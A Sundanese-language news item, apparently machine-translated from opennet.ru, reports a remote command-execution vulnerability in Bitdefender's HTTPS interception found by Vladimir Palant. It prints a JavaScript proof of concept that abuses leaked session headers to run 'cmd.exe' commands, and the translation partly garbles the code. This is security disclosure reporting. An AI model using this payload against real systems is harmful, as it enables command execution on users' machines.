Vladimir Palant, panyipta Adblock Plus,
Anu ngabalukarkeun masalah nyaéta yén antipirus Bitdefender ngalaksanakeun interception lokal tina lalu lintas HTTPS ku ngagentos sertipikat TLS asli situs éta. Sertipikat akar tambahan dipasang dina sistem klien, anu ngamungkinkeun pikeun nyumputkeun operasi sistem pamariksaan lalu lintas anu dianggo. Antipirus wedges sorangan kana lalulintas ditangtayungan tur inserts kode JavaScript sorangan kana sababaraha kaca pikeun nerapkeun fungsi Search Aman, jeung bisi aya masalah sareng sertipikat sambungan aman, éta ngagantikeun kaca kasalahan balik kalawan sorangan. Kusabab kaca kasalahan anyar dilayanan atas nama server dibuka, kaca séjén dina server nu boga aksés pinuh kana eusi diselapkeun ku Bitdefender.
Nalika muka situs anu dikawasa ku panyerang, situs éta tiasa ngirim XMLHttpRequest sareng pura-pura masalah sareng sertipikat HTTPS nalika ngaréspon, anu bakal ngakibatkeun mulang halaman kasalahan anu dipalsukan ku Bitdefender. Kusabab halaman kasalahan dibuka dina konteks domain panyerang, anjeunna tiasa maca eusi halaman spoofed sareng parameter Bitdefender. Halaman anu disayogikeun ku Bitdefender ogé ngandung konci sési anu ngamungkinkeun anjeun nganggo API Bitdefender internal pikeun ngaluncurkeun sési browser Safepay anu misah, netepkeun umbul garis paréntah sawenang, sareng pikeun ngaluncurkeun paréntah sistem nganggo "--utility-cmd-prefix" bandéra. Conto eksploitasi (param1 sareng param2 mangrupikeun nilai anu dicandak tina halaman kasalahan):
var pamundut = XMLHttpRequest anyar ();
request.open("POST", Math.random());
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
request.setRequestHeader(«BDNDSS_B67EA559F21B487F861FDA8A44F01C50», param1);
request.setRequestHeader(«BDNDCA_BBACF84D61A04F9AA66019A14B035478», param2);
request.setRequestHeader(«BDNDWB_5056E556833D49C1AF4085CB254FC242», «obk.run»);
request.setRequestHeader(«BDNDOK_4E961A95B7B44CBCA1907D3D3643370D», location.href);
request.send("data:text/html,nada —utility-cmd-prefix=\"cmd.exe /k whoami & echo\"");
Hayu urang émut yén ulikan anu dilakukeun dina 2017
Ngan 11 tina 26 produk anu nyayogikeun suite cipher ayeuna. 5 sistem henteu pariksa sertipikat (Kaspersky Internet Security 16 Mac, NOD32 AV 9, CYBERsitter, Net Nanny 7 Win, Net Nanny 7 Mac). Produk Kaspersky Internet Security sareng Total Security tiasa diserang
sumber: opennet.ru